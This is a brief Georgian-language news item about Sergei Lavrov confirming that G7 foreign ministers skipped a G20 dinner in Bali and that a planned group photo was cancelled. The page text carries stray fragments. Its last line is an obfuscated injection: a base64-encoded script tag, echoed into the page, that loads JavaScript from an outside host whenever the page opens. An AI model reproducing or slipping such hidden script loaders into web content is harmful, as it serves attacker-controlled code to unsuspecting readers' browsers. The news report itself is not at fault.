celsiusi
ავერსი შნაიდერი
რუსეთის საგარეო საქმეთა მინისტრმა, სერგეი ლავროვმა დაადასტურა გავრცელებული ინფორმაცია, რომ "დიდი შვიდეულის" საგარეო საქმეთა მინისტრებმა უარი თქვეს დასწრებოდნენ ვახშამს, კუნძულ ბალიზე, რომელიც "დიდი ოცეულის" წევრი ქვეყნების მინისტრებისთვის იმართებოდა. 
 
რუსულ სახელმწიფო მედია "ტასზე" გავრცელდა ლავროვის კომენტარი, რომელმაც თქვა, რომ მინისტრებს "არ ესმით თავაზიანობა და ეტიკეტის წესები".
 
"გუშინ გაიმართა მიღება, კონცერტით, ისინი (G7 ქვეყნები) იქ არ მივიდნენ. ეს არის მათი გაგება პროტოკოლის მიმართ და უბრალოდ თავაზიანობა და ეთიკა", - განაცხადა ლავროვმა. 
 
ლავროვი, ასევე გამოეხმაურა CNN-ის გავრცელებულ ინფორმაციას, რომ აშშ-ის სახელმწიფო მდივანი, ენტონი ბლინკენი აპირებდა თავი აერიდებინა ჯგუფური ფოტოსესიითვის. ლავროვმა საკითხთან დაკავშირებით განაცხადა, რომ მას გადასაღებად არავინ დაუპატიჟებია. 
 
მოგვიანებით იაპონური მედიის ცნობით, ფოტოსესია საერთოდ გაუქმდა, რადგან მინისტრების ნაწილმა მონაწილეობაზე უარი თქვა.
638
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");